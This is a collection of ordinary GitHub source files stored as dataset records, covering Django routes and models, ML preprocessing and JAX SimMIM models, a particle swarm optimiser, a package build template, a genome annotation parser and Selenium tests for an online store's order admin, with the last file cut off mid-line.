name='order-item-delete'),\n path('order-items/update-quantity/', OrderQuantityUpdateView.as_view(), name='order-item-update-quantity'),\n path('add-coupon/', AddCouponView.as_view(), name='add-coupon'),\n path('addresses/', AddressListView.as_view(), name='address-list'),\n path('checkout/', PaymentView.as_view(), name='checkout'),\n path('order-history/', OrderHistoryView.as_view(), name='order-history'),\n path('user-id/', UserIDView.as_view(), name='user-id'),\n path('addresses/create/', AddressCreateView.as_view(), name='address-create'),\n path('addresses//update/', AddressUpdateView.as_view(), name='address-update'),\n path('addresses//delete/', AddressDeleteView.as_view(), name='address-delete'),\n path('countries/', CountryListView.as_view(), name='countries'),\n path('regions/', RegionListView.as_view(), name='regions'),\n path('cities/', CityListView.as_view(), name='cities'),\n]\n","repo_name":"kyleherring180/DjangoReactEcommerce","sub_path":"backend/src/core/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"42466113523","text":"# preprocess data\n\ndef preprocess_data(load_data_path: InputPath(str), \n preprocess_data_path: OutputPath(str)):\n \n # import Library\n import sys, subprocess;\n subprocess.run([\"python\", \"-m\", \"pip\", \"install\", \"--upgrade\", \"pip\"])\n subprocess.run([sys.executable, '-m', 'pip', 'install','pandas'])\n subprocess.run([sys.executable, '-m', 'pip', 'install','scikit-learn'])\n import os, pickle;\n import pandas as pd\n import numpy as np\n from sklearn.model_selection import train_test_split\n\n #loading the train data\n with open(f'{load_data_path}/all_data', 'rb') as f:\n ntrain, all_data = pickle.load(f)\n \n # split features and label\n all_data_X = all_data.drop('label', axis=1)\n all_data_y = all_data.label\n \n # Reshape image in 3 dimensions (height = 28px, width = 28px , channel = 1)\n all_data_X = all_data_X.values.reshape(-1,28,28,1)\n\n # Normalize the data\n all_data_X = all_data_X / 255.0\n \n #Get the new dataset\n X = all_data_X[:ntrain].copy()\n y = all_data_y[:ntrain].copy()\n \n # split into train and test\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)\n \n #creating the preprocess directory\n os.makedirs(preprocess_data_path, exist_ok = True)\n \n #Save the train_data as a pickle file to be used by the modelling component.\n with open(f'{preprocess_data_path}/train', 'wb') as f:\n pickle.dump((X_train, y_train), f)\n \n #Save the test_data as a pickle file to be used by the predict component.\n with open(f'{preprocess_data_path}/test', 'wb') as f:\n pickle.dump((X_test, y_test), f)\n \n return(print('Done!'))","repo_name":"chasecadet/ezaf","sub_path":"pipelines/v1 /containerized_python_components/digit-recognition-kaggle-competition/components/GPT_files /preprocess_data /preprocess_data.py","file_name":"preprocess_data.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"13512145256","text":"import dataclasses\nfrom typing import Any, Tuple\n\nimport einops\nimport jax.numpy as jnp\nfrom flax import linen\n\nfrom .HiViT import HierarchicalViT\nfrom .SwinV2 import SwinTransformerV2\nfrom .ViT import VisionTransformer\n\n\nclass WindowedNorm(linen.Module):\n target_size: Tuple[int]\n window_size: int = 47\n\n def get_targets_count(self):\n window_shape = (self.window_size, self.window_size)\n padding = (\n (self.window_size // 2, self.window_size // 2),\n (self.window_size // 2, self.window_size // 2),\n )\n\n targets_count = jnp.ones((1, self.target_size[0], self.target_size[1], 1))\n\n targets_count = linen.avg_pool(\n targets_count,\n window_shape=window_shape,\n strides=(1, 1),\n padding=padding,\n count_include_pad=True,\n )\n targets_count = targets_count * jnp.power(self.window_size, 2.0)\n targets_count = jnp.int32(jnp.rint(targets_count))\n return targets_count\n\n def setup(self):\n self.targets_count = self.variable(\n \"simmim_constants\",\n \"targets_count\",\n self.get_targets_count,\n ).value\n\n def __call__(self, targets):\n window_size = self.window_size\n\n window_shape = (window_size, window_size)\n padding = (\n (window_size // 2, window_size // 2),\n (window_size // 2, window_size // 2),\n )\n\n targets_ = targets\n\n targets_square = jnp.power(targets, 2.0)\n\n targets_mean = linen.avg_pool(\n targets,\n window_shape=window_shape,\n strides=(1, 1),\n padding=padding,\n count_include_pad=False,\n )\n targets_square_mean = linen.avg_pool(\n targets_square,\n window_shape=window_shape,\n strides=(1, 1),\n padding=padding,\n count_include_pad=False,\n )\n\n targets_var = targets_square_mean - jnp.power(targets_mean, 2.0)\n targets_var = targets_var * (self.targets_count / (self.targets_count - 1))\n targets_var = jnp.maximum(targets_var, 0.0)\n\n targets_ = (targets_ - targets_mean) / jnp.sqrt(targets_var + 1.0e-6)\n\n return targets_\n\n\nclass SwinTransformerV2ForSimMIM(SwinTransformerV2):\n def setup(self):\n super().setup()\n\n token_init = linen.initializers.normal(0.02)\n self.mask_token = self.param(\"mask_token\", token_init, (1, 1, self.embed_dim))\n\n def __call__(self, x, mask, train: bool = False):\n x = self.patch_embed(x)\n\n B, L, _ = x.shape\n mask_token = linen.dtypes.promote_dtype(self.mask_token, dtype=self.dtype)[0]\n mask_tokens = jnp.broadcast_to(mask_token, (B, L, self.embed_dim))\n mask = jnp.reshape(mask, (B, L, 1)).astype(mask_tokens.dtype)\n x = x * (1.0 - mask) + mask_tokens * mask\n\n x = self.pos_drop(x, deterministic=not train)\n\n for layer in self.swin_body:\n x = layer(x, train=train)\n\n x = self.norm(x)\n\n B, L, C = x.shape\n H = W = int(L**0.5)\n x = jnp.reshape(x, (B, H, W, C))\n return x\n\n def get_stride(self):\n return self.patch_size * 2 ** (len(self.depths) - 1)\n\n\nclass VisionTransformerForSimMIM(VisionTransformer):\n def setup(self):\n super().setup()\n\n token_init = linen.initializers.normal(0.02)\n self.mask_token = self.param(\"mask_token\", token_init, (1, 1, self.embed_dim))\n\n def __call__(self, x, mask, train: bool = False):\n x = self.patch_embed(x)\n\n B, L, _ = x.shape\n mask_tokens = jnp.broadcast_to(self.mask_token, (B, L, self.embed_dim))\n mask = jnp.reshape(mask, (B, L, 1)).astype(mask_tokens.dtype)\n x = x * (1.0 - mask) + mask_tokens * mask\n\n x = self.pos_emb(x)\n\n for layer in self.vit_body:\n x = layer(x, train=train)\n\n x = self.norm(x)\n\n B, L, C = x.shape\n H = W = int(L**0.5)\n x = jnp.reshape(x, (B, H, W, C))\n return x\n\n def get_stride(self):\n return self.patch_size\n\n\nclass HierarchicalViTForSimMIM(HierarchicalViT):\n def setup(self):\n super().setup()\n\n token_init = linen.initializers.normal(0.02)\n self.mask_token = self.param(\"mask_token\", token_init, (1, 1, self.embed_dim))\n\n def __call__(self, x, mask, train: bool = False):\n x = self.patch_embed(x)\n\n B, L, _ = x.shape\n H = W = int(L**0.5)\n mask_token = linen.dtypes.promote_dtype(self.mask_token, dtype=self.dtype)[0]\n mask_tokens = jnp.broadcast_to(mask_token, (B, L, self.embed_dim))\n mask = jnp.reshape(mask, (B, H, W, 1)).astype(mask_tokens.dtype)\n mask = self.patch_embed.patches_reshape(mask)\n x = x * (1.0 - mask) + mask_tokens * mask\n\n for layer in self.vit_body:\n x = layer(x, train=train)\n\n x = self.norm(x)\n\n B, L, C = x.shape\n H = W = int(L**0.5)\n x = jnp.reshape(x, (B, H, W, C))\n return x\n\n def get_stride(self):\n return 16\n\n\nclass SimMIM(linen.Module):\n encoder: linen.Module = SwinTransformerV2ForSimMIM\n encoder_stride: int = 32\n\n patch_size: int = 4\n\n enable_windowed_norm: bool = False\n norm_patch_size: int = 47\n\n dtype: Any = jnp.float32\n\n @linen.compact\n def __call__(self, x, mask, train: bool = False):\n z = self.encoder(x, mask, train)\n x_rec = linen.Conv(\n features=self.encoder_stride**2 * 3,\n kernel_size=(1, 1),\n dtype=self.dtype,\n )(z)\n x_rec = einops.rearrange(\n x_rec,\n pattern=\"... h w (c b1 b2) -> ... (h b1) (w b2) c\",\n b1=self.encoder_stride,\n b2=self.encoder_stride,\n )\n\n mask = jnp.expand_dims(\n jnp.repeat(\n jnp.repeat(mask, self.patch_size, axis=1),\n self.patch_size,\n axis=2,\n ),\n axis=-1,\n )\n\n B, H, W, C = x.shape\n if self.enable_windowed_norm:\n x = WindowedNorm(target_size=(H, W), window_size=self.norm_patch_size)(x)\n\n x_rec = linen.dtypes.promote_dtype(x_rec, dtype=x.dtype)[0]\n loss_recon = jnp.abs(x - x_rec)\n loss = jnp.sum(loss_recon * mask) / (jnp.sum(mask) + 1e-5) / C\n\n return loss, x_rec\n\n @classmethod\n def build(cls, config, **kwargs):\n encoder = config.encoder.build(config.encoder, **kwargs)\n\n config = dataclasses.asdict(config)\n config = {key: kwargs[key] if key in kwargs else config[key] for key in config}\n config[\"encoder\"] = encoder\n config[\"encoder_stride\"] = encoder.get_stride()\n return cls(**config)\n\n def extend_parser(self, parser):\n parser = self.encoder.extend_parser(parser)\n parser.add_argument(\n \"--enable-windowed-norm\",\n action=\"store_true\",\n help=\"Use windowed norm of input images as reconstruction target in SimMIM\",\n )\n return parser\n\n def should_decay(self, path, _):\n if path[0].key == \"encoder\":\n return self.encoder.should_decay(path[1:], _)\n\n is_kernel = path[-1].key == \"kernel\"\n verdict = is_kernel\n return verdict\n\n\ndef simmim_swinv2_tiny():\n config = {\n \"embed_dim\": 96,\n \"depths\": (2, 2, 6, 2),\n \"num_heads\": (3, 6, 12, 24),\n }\n encoder = SwinTransformerV2ForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.get_stride(),\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n\n\ndef simmim_swinv2_base():\n config = {\n \"embed_dim\": 128,\n \"depths\": (2, 2, 18, 2),\n \"num_heads\": (4, 8, 16, 32),\n }\n encoder = SwinTransformerV2ForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.get_stride(),\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n\n\ndef simmim_swinv2_large():\n config = {\n \"embed_dim\": 192,\n \"depths\": (2, 2, 18, 2),\n \"num_heads\": (6, 12, 24, 48),\n }\n encoder = SwinTransformerV2ForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.get_stride(),\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n\n\ndef simmim_vit_small():\n config = {\n \"num_layers\": 12,\n \"embed_dim\": 384,\n \"mlp_dim\": 1536,\n \"num_heads\": 6,\n }\n encoder = VisionTransformerForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.get_stride(),\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n\n\ndef simmim_vit_base():\n config = {\n \"num_layers\": 12,\n \"embed_dim\": 768,\n \"mlp_dim\": 3072,\n \"num_heads\": 12,\n }\n encoder = VisionTransformerForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.patch_size,\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n\n\ndef simmim_hivit_tiny():\n config = {\n \"depths\": (1, 1, 10),\n \"embed_dim\": 96,\n \"mlp_ratio\": (3.0, 3.0, 4.0),\n \"num_heads\": (None, None, 6),\n }\n encoder = HierarchicalViTForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.get_stride(),\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n\n\ndef simmim_hivit_small(**kwargs):\n config = {\n \"depths\": (2, 2, 20),\n \"embed_dim\": 96,\n \"mlp_ratio\": (3.0, 3.0, 4.0),\n \"num_heads\": (None, None, 6),\n }\n encoder = HierarchicalViTForSimMIM(**config)\n\n config = {\n \"encoder\": encoder,\n \"encoder_stride\": encoder.get_stride(),\n \"patch_size\": encoder.patch_size,\n }\n return SimMIM(**config)\n","repo_name":"SmilingWolf/JAX-CV","sub_path":"Models/SimMIM.py","file_name":"SimMIM.py","file_ext":"py","file_size_in_byte":9908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"16589553675","text":"\"\"\"\nImporting necessary libraries.\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\"\"\"\nClass to represent a function to be minimized.\n\"\"\"\nclass function:\n def func(x):\n return((x[1][0]-x[0][0])**4 + 12*x[0][0]*x[1][0] - x[0][0] + x[1][0] - 3)\n\n\"\"\"\nFOllowing class represnts a particle in population.\n\"\"\"\nclass particle(function):\n \"\"\"\n Following function initializes a particle's parameters.\n \"\"\"\n def __init__(self):\n self.x = np.random.rand(2,1)\n self.v = np.random.rand(2,1)\n self.p = self.x\n self.x_arr = []\n self.x_arr.append(self.x)\n self.level_set = []\n self.level_set.append(function.func(self.x))\n \nclass PSO(function):\n \"\"\"\n Following function initializes the swarm based on provided parameters.\n \"\"\"\n def __init__(self,epochs,d,w,c1,c2):\n self.swarm = []\n self.best = []\n self.worst = []\n self.average = []\n for i in range(d):\n par = particle()\n self.swarm.append(par)\n self.d = d\n self.w = w\n self.c1 = c1\n self.c2 = c2\n self.epochs = epochs\n self.g = None\n for i in range(d):\n if(i == 0):\n self.g = self.swarm[0].x\n elif(function.func(self.g)>function.func(self.swarm[i].x)):\n self.g = self.swarm[i].x\n \n \"\"\"\n Following function generates a new swarm for each iteration and essentially minimizes the function.\n \"\"\"\n def minimize(self):\n for i in range(self.epochs):\n for j in range(self.d):\n r = np.random.uniform(0.01,1,(2,1))\n s = np.subtract(np.ones((2,1)),r)\n self.swarm[j].v = np.add(np.add(np.multiply(self.w,self.swarm[j].v) , np.multiply(self.c1,np.multiply(r,np.subtract(self.swarm[j].p,self.swarm[j].x)))),np.multiply(self.c2,np.multiply(s,np.subtract(self.g,self.swarm[j].x))))\n self.swarm[j].x = self.swarm[j].x + self.swarm[j].v\n self.swarm[j].x_arr.append(self.swarm[j].x)\n self.swarm[j].level_set.append(function.func(self.swarm[j].x))\n if(function.func(self.swarm[j].x) < function.func(self.swarm[j].p)):\n self.swarm[j].p = self.swarm[j].x\n worst_curr = -999999\n avg_curr = 0\n best_curr = 999999\n for j in range(self.d):\n if(function.func(self.swarm[j].x)worst_curr):\n worst_curr = function.func(self.swarm[j].x)\n avg_curr = avg_curr + function.func(self.swarm[j].x) \n if(function.func(self.swarm[j].x) < function.func(self.g)):\n self.g = self.swarm[j].x\n avg_curr = avg_curr/(self.d)\n self.best.append(best_curr)\n self.average.append(avg_curr)\n self.worst.append(worst_curr)\n print(\"minimum value : \",function.func(self.g),\"minimizer point:\",self.g)\n \n \"\"\"\n Following function is used to generate a list of function values from given list x2 and x1. \n \"\"\"\n def fx_contour(self,x1,x2):\n return np.power(x2-x1,4)+(12*x1*x2)-x1+x2-3\n \n \"\"\"\n Following function is used plot a contour plot and the plot of best, average and worst function values for each iteration.\n \"\"\"\n def plot(self):\n X = np.linspace(-1,1,50)\n Y = np.linspace(-1,1,50)\n X,Y = np.meshgrid(X,Y)\n Z = self.fx_contour(X,Y)\n plt.contour(X,Y,Z,colors='black')\n for j in range(self.d):\n x1 = []\n x2 = []\n self.swarm[0].x_arr = np.array(self.swarm[0].x_arr)\n for i in range(self.epochs + 1):\n x1.append(self.swarm[j].x_arr[i][0][0])\n x2.append(self.swarm[j].x_arr[i][1][0])\n plt.plot(x1,x2,color='blue')\n plt.scatter(x1,x2,color='red')\n plt.show()\n X = []\n for i in range(len(self.best)):\n X.append(i+1)\n plt.plot(X,self.best,color='green')\n plt.scatter(X,self.best,color='green')\n plt.plot(X,self.average,color='blue')\n plt.scatter(X,self.average,color='blue')\n plt.plot(X,self.worst,color='red')\n plt.scatter(X,self.worst,color='red')\n plt.ylabel(\"Function value\")\n plt.xlabel(\"Iteration\")\n plt.title(\"Best, average and worst function value at each iteration\")\n plt.show()\n\n\"\"\"\nFollowing piece of code initializes a PSO object, calls minimize function and plots final graphs.\n\"\"\"\nnum_of_particles = 14\nnum_of_iterations = 20\nparticle_best_weight = 1.8\nglobal_best_weight = 1.8\nparticle_previous_influence_weight = 0.8\npso = PSO(num_of_iterations,num_of_particles,particle_previous_influence_weight,particle_best_weight,global_best_weight)\npso.minimize()\npso.plot()","repo_name":"Shahil98/Optimization-Algorithms","sub_path":"PSO/PSO.py","file_name":"PSO.py","file_ext":"py","file_size_in_byte":4968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"947566822","text":"pkgname = \"waypipe\"\npkgver = \"0.8.6\"\npkgrel = 0\nbuild_style = \"meson\"\nconfigure_args = [\n \"-Dwith_dmabuf=enabled\",\n \"-Dwith_systemtap=false\",\n \"-Dwith_vaapi=enabled\",\n \"-Dwith_video=enabled\",\n \"-Dwith_zstd=enabled\",\n \"-Db_ndebug=true\",\n]\nhostmakedepends = [\n \"meson\",\n \"pkgconf\",\n \"scdoc\",\n \"wayland-progs\",\n]\nmakedepends = [\n \"ffmpeg-devel\",\n \"libdrm-devel\",\n \"libva-devel\",\n \"zstd-devel\",\n \"mesa-devel\",\n \"wayland-devel\",\n \"wayland-protocols\",\n]\npkgdesc = \"Proxy for wayland clients\"\nmaintainer = \"psykose \"\nlicense = \"MIT\"\nurl = \"https://gitlab.freedesktop.org/mstoeckl/waypipe\"\nsource = f\"https://gitlab.freedesktop.org/mstoeckl/waypipe/-/archive/v{pkgver}/waypipe-v{pkgver}.tar.bz2\"\nsha256 = \"da40de2e02d60c2c34d549e791a9019c1ddf9d79f42bfad0c6cb74f3f6af9b16\"\nhardening = [\"vis\", \"cfi\"]\n\n\ndef post_install(self):\n self.install_license(\"COPYING\")\n","repo_name":"chimera-linux/cports","sub_path":"contrib/waypipe/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"36"} +{"seq_id":"74143297703","text":"def coolString(inputString):\n\n def isLowercase(symbol):\n if 'a' <= symbol <= 'z':\n return True\n return False\n\n def isUppercase(symbol):\n if 'A' <= symbol <= 'Z':\n return True\n return False\n\n firstIsLowercase = isLowercase(inputString[0])\n firstIsUppercase = isUppercase(inputString[0])\n\n if not (firstIsLowercase or firstIsUppercase):\n return False\n\n for i in range(1, len(inputString)):\n if i % 2 != 0:\n if (isLowercase(inputString[i]) == firstIsLowercase or\n isUppercase(inputString[i]) == firstIsUppercase):\n return False\n else:\n if (isLowercase(inputString[i]) != firstIsLowercase or\n isUppercase(inputString[i]) != firstIsUppercase):\n return False\n","repo_name":"jahirulislammolla/CodeFights","sub_path":"Fights/coolString.py","file_name":"coolString.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"} +{"seq_id":"6228768502","text":"from django.db import models\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\n# Create your models here.\n\n\n\n# ? not sure wether to have user on workouts or workouts on user?\n# ! calculating speed in serializers\n# ? graph relationships to workouts. many to one? how would model show \n# ? fields to have on graph model?\n# * have levels associated with graph for exp?\n\n\nclass MuscleTraining(models.Model):\n name = models.CharField(max_length=50)\n muscles_worked = models.CharField(max_length=100)\n weight = models.IntegerField()\n duration = models.IntegerField(null=True)\n sets = models.IntegerField()\n reps = models.IntegerField()\n speed = models.IntegerField(null=True)\n user = models.ForeignKey(User, related_name='muscle_trainings', on_delete=models.CASCADE)\n\n def __str__(self):\n return f'{self.name}'\n\nclass Cardio(models.Model):\n type = models.CharField(max_length=50)\n duration = models.IntegerField()\n distance = models.IntegerField()\n speed = models.FloatField(null=True)\n user = models.ForeignKey(User, related_name='cardios', on_delete=models.CASCADE)\n def __str__(self):\n return f'{self.type}'\n\n\n","repo_name":"tombannister01/Fitness-Tracker-App","sub_path":"workouts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"21588445168","text":"#Blinks LED on pin 13 - Adafruit Edge Badge\n#No other files required\n\nimport time\nimport board\nfrom digitalio import DigitalInOut, Direction, Pull\n\nled = DigitalInOut(board.D13)\nled.direction = Direction.OUTPUT\n\nwhile True:\n led.value = True\n time.sleep(1)\n led.value = False\n time.sleep(1)\n","repo_name":"JeremySCook/Edge-Badge","sub_path":"blink-led.py","file_name":"blink-led.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"16108409610","text":"\n# coding: utf-8\n\n# In[1]:\n\n#!/usr/bin/env python\n\n\"\"\"new_gtf_genome_wide_parser.py: New gtf parses much faster and more effecient.\"\"\"\n\n__authos__ = \"Israa Alqassem\"\n__copyright__ = \"Copyright 2017, McSplicer\"\n\n\nimport csv\nimport numpy as np\nimport time\nfrom collections import defaultdict\n\n\n\ndef get_all_genes_dict(gtf_file, tx_anno=False):\n\n gene_dict = {}\n ss_anno = defaultdict(list)\n\n with open(gtf_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\")\n for line in reader:\n if line[2] == 'subexon':\n start_site = int(line[3])\n end_site = int(line[4])\n strand_dir = line[6]\n\n gene_id = ''\n chr_id = line[0]\n\n feature_list = line[8].split(';')\n for feature in feature_list:\n tag_val = feature.split()\n if len(tag_val) == 2:\n\n tag = tag_val[0]\n value = tag_val[1]\n\n if tag=='SpliceEnd':\n splice_end = value[1:2] # R, L, or B\n elif tag=='NodeId':\n subexon_id = int(value)\n elif tag=='transcript_id':\n trans_id = value[1:-1]\n elif tag == 'gene_id':\n gene_id = value[1:-1] #remove double qouts\n\n if gene_id != '':\n if gene_id not in gene_dict:\n gene_dict[gene_id] = []\n\n\n gene_dict[gene_id].append([subexon_id,strand_dir,splice_end,start_site,end_site,trans_id,chr_id])\n if tx_anno:\n ss_anno[start_site].append(trans_id)\n ss_anno[end_site].append(trans_id)\n\n return gene_dict,ss_anno\n\n\n\n\ndef create_location_dicts(start_sites, end_sites, strand_dir):\n \"\"\" This func expects sorted start_sites and end_sites based on strand direction\n Returns 3 dicts:\n loc_index_dict -> Key: location, val: index\n start_sites_dict -> key: start location, index (helps to determine s1, s2, ...)\n end_sites_dict -> key: end location, index (helps to determine e1, e2, ...)\n \"\"\"\n\n loc_index_dict = {}\n start_sites_dict = {}\n end_sites_dict = {}\n\n location_list = [] # List of all start and end locations\n location_list.extend(start_sites)\n location_list.extend(end_sites)\n\n if strand_dir == '+':\n location_list.sort()\n else:\n location_list.sort(reverse=True)\n\n index = 0\n #print 'index','location'\n for location in location_list:\n #if location not in loc_index_dict:\n #print index, location\n loc_index_dict[location] = index\n index+=1\n\n index = 0\n for location in start_sites:\n start_sites_dict[location] = index\n index+=1\n\n index = 0\n for location in end_sites:\n end_sites_dict[location] = index\n index+=1\n\n\n return loc_index_dict, start_sites_dict, end_sites_dict\n\n\ndef get_gene_data(gene_id,gene_datalist):\n\n #for gene_id in gene_dict.keys():\n\n subexon_ids_dict = {}\n start_sites = []\n end_sites = []\n\n #print '>>>>>',gene_id\n for row in gene_datalist:\n subexon_id = row[0]\n strand_dir = row[1]\n splice_end = row[2]\n start_site = row[3]\n end_site = row[4]\n trans_id = row[5]\n\n\n \"\"\"\n Forward strand (+):\n potential start sites -> Left of L\n Left of B\n potential end sites -> Right of R\n Right of B\n\n s_____s____ e_____e\n |__L__|__B__|__R__|\n\n\n Backward strand (+):\n potential start site -> right of L\n right of B\n potential end site -> Left of R\n Left of B\n\n e_____e_____s_____s\n |__R__|__B__|__L__|\n\n \"\"\"\n\n if strand_dir == '+': # Forward strand\n subexon_ids_dict[subexon_id] = [start_site,end_site]\n\n if splice_end=='R':\n end_sites.append(end_site)\n elif splice_end=='L':\n start_sites.append(start_site)\n\n elif splice_end=='B':\n start_sites.append(start_site)\n end_sites.append(end_site)\n\n elif splice_end !='-': # dash means internal exon, just ignore it, otherwise show error\n print('Error: Splice end value must be L, R, or B. Undefined splice end -> ' + splice_end)\n\n elif strand_dir == '-': # Reverse strand\n subexon_ids_dict[subexon_id] = [end_site,start_site]\n\n if splice_end=='R':\n end_sites.append(start_site)\n elif splice_end=='L':\n start_sites.append(end_site)\n\n elif splice_end=='B':\n start_sites.append(end_site)\n end_sites.append(start_site)\n\n elif splice_end !='-': # dash means internal exon, just ignore it, otherwise show error\n print('Error: Splice end value must be L, R, or B. Undefined splice end -> ' + splice_end)\n\n\n start_sites = list(np.unique(start_sites))\n end_sites = list(np.unique(end_sites))\n\n\n if strand_dir == '-':\n end_sites.sort(reverse=True)\n start_sites.sort(reverse=True)\n elif strand_dir == '+':\n end_sites.sort()\n start_sites.sort()\n\n\n loc_index_dict, start_sites_dict, end_sites_dict = create_location_dicts(start_sites,end_sites, strand_dir)\n\n\n\n return strand_dir,loc_index_dict, start_sites_dict, end_sites_dict, subexon_ids_dict\n\n#start_time = time.time()\n#print \"--- %s seconds ---\" % str('{0:0.2f}'.format(time.time() - start_time))\n","repo_name":"canzarlab/McSplicer","sub_path":"python_scripts/new_gtf_genome_wide_parser.py","file_name":"new_gtf_genome_wide_parser.py","file_ext":"py","file_size_in_byte":5951,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"36"} +{"seq_id":"28869998262","text":"class Platoon(pycbf2.NESystem):\n def __init__(self, length, t_safety, v_goal):\n super(Platoon, self).__init__()\n\n for i in range(length):\n vehicle = Link(\n parent=self,\n mass=1,\n center_of_mass=[0, 0, 0],\n inertia_tensor=np.eye(3),\n index=i,\n axis=[1, 0, 0],\n link_type=LinkType.prismatic,\n rotation_local=np.eye(3),\n position=[0, 0, 0],\n )\n\n t, x, xdot = self.cbf_vars()\n\n class Controller(cbf.ControlFunc):\n def __init__(self):\n self.cbf = 1\n for i in range(length - 1):\n self.cbf *= (x[i + 1] - x[i]) - t_safety * xdot[i]\n self.t = 0\n\n def input_matrix(self, x, xdot):\n return np.eye(length)\n\n def uref(self, x, xdot):\n return v_goal - xdot\n\n self.controller = Controller()","repo_name":"danieljpietz/MSThesis","sub_path":"Code Examples/Platoon.py","file_name":"Platoon.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"24214557733","text":"from lib.ui_lib import *\n\nclass OrderClass(CommonMethods):\n\n def get_order_number(self,browser):\n element = self.wait_until_element_present('//div[@class = \"alert alert-success\"]/p', \"XPATH\")\n browser_success_msg = element.text\n order_number = browser_success_msg[7:10]\n assert order_number != ''\n return order_number\n\n def search_order(self,browser,orderID):\n self.wait_until_element_present('keyword-filter', 'ID')\n e = browser.find_element_by_id('keyword-filter')\n e.send_keys(orderID)\n try:\n browser.find_element_by_xpath('//span[@class=\"responsive-hide\"]').click()\n except NoSuchElementException:\n browser.find_element_by_css_selector('.action-divider .filter-button').click()\n except WebDriverException:\n pass\n\n def get_order_status(self,browser, url, Order_Id):\n browser.get(urlparse.urljoin(url, '/admin/index.php?ToDo=viewOrders'))\n element = self.wait_until_element_present('//input[@id=\"keyword-filter\"]', \"XPATH\")\n element.clear()\n element.send_keys(Order_Id)\n browser.find_element_by_css_selector('.filter .btn-secondary').click()\n self.wait_until_element_present('status_' + Order_Id, 'ID')\n return browser.find_element_by_id('status_' + Order_Id).get_attribute('value')\n\n def refund_funds(self,browser, Order_Id):\n # Open order cog\n element = self.wait_until_element_present(\"//tr[@data-order-id = '\" + Order_Id + \"']\", 'XPATH')\n element = element.find_element_by_class_name('dropdown-trigger')\n element.click()\n # Open Refund modal\n element = self.wait_until_element_present('Refund', 'LINK')\n element.click()\n # Refund transaction\n element = self.wait_until_element_present('//label[@for=\"refundType_full\"]', 'XPATH')\n element.click()\n browser.find_element_by_id('refund-save').click()\n\n def capture_funds(self,browser, Order_Id):\n # Open order cog\n element = self.wait_until_element_present(\"//tr[@data-order-id = '\" + Order_Id + \"']\", 'XPATH')\n element = element.find_element_by_class_name('dropdown-trigger')\n element.click()\n # Open capture modal\n element = self.wait_until_element_present('Capture Funds', 'LINK')\n element.click()\n # Process capture\n element = self.wait_until_element_present('#display-modal .dialog-actions .btn-primary', 'CSS_SELECTOR')\n element.click()\n\n\n def void_transaction(self,browser, Order_Id):\n # Open order cog\n element = self.wait_until_element_present(\"//tr[@data-order-id = '\" + Order_Id + \"']\", 'XPATH')\n element = element.find_element_by_class_name('dropdown-trigger')\n element.click()\n # Open capture modal\n element = self.wait_until_element_present('Void Transaction', 'LINK')\n element.click()\n # Process capture\n element = self.wait_until_element_present('#display-modal .dialog-actions .btn-primary', 'CSS_SELECTOR')\n element.click()\n\n\n def delete_order(self,browser):\n\n browser.find_element_by_xpath('//label[@for = \"order0\"]').click()\n self.select_dropdown_value(browser, 'OrderActionSelect', 'Archive Selected')\n browser.find_element_by_id('action-confirm').click()\n try:\n alert = browser.switch_to_alert()\n alert.accept()\n except WebDriverException:\n browser.execute_script(\"window.confirm = function(){return true;}\");\n browser.find_element_by_id('action-confirm').click()\n #Verify Order delete\n element = self.wait_until_element_present('//div[@class = \"alert alert-success\"]/p', \"XPATH\").text\n assert \"The selected orders have been deleted successfully.\" in element\n\n def goto_view_orders(self,browser):\n self.wait_until_element_present('Orders', 'LINK').click()\n self.wait_until_element_present('View Orders', 'LINK').click()\n\n def cp_add_order_item(self,browser,name):\n #Add an Item\n element = self.wait_until_element_present('quote-item-search', \"ID\")\n element.click()\n element.send_keys(name)\n self.wait_until_element_present('//div[@class = \"recordContent undefined\"]', 'XPATH')\n browser.execute_script(\"$('#quote-item-search').trigger('keyup')\")\n browser.execute_script(\"$('.recordContent:eq(0)').trigger('click')\")\n self.wait_until_element_present('//span[@class = \"swatchColour swatchColour_1\"]', \"XPATH\")\n browser.find_element_by_xpath('//span[@class = \"swatchColour swatchColour_1\"]').click()\n browser.find_element_by_id('dialog-options-submit').click()\n self.wait_until_element_present('//th[@class = 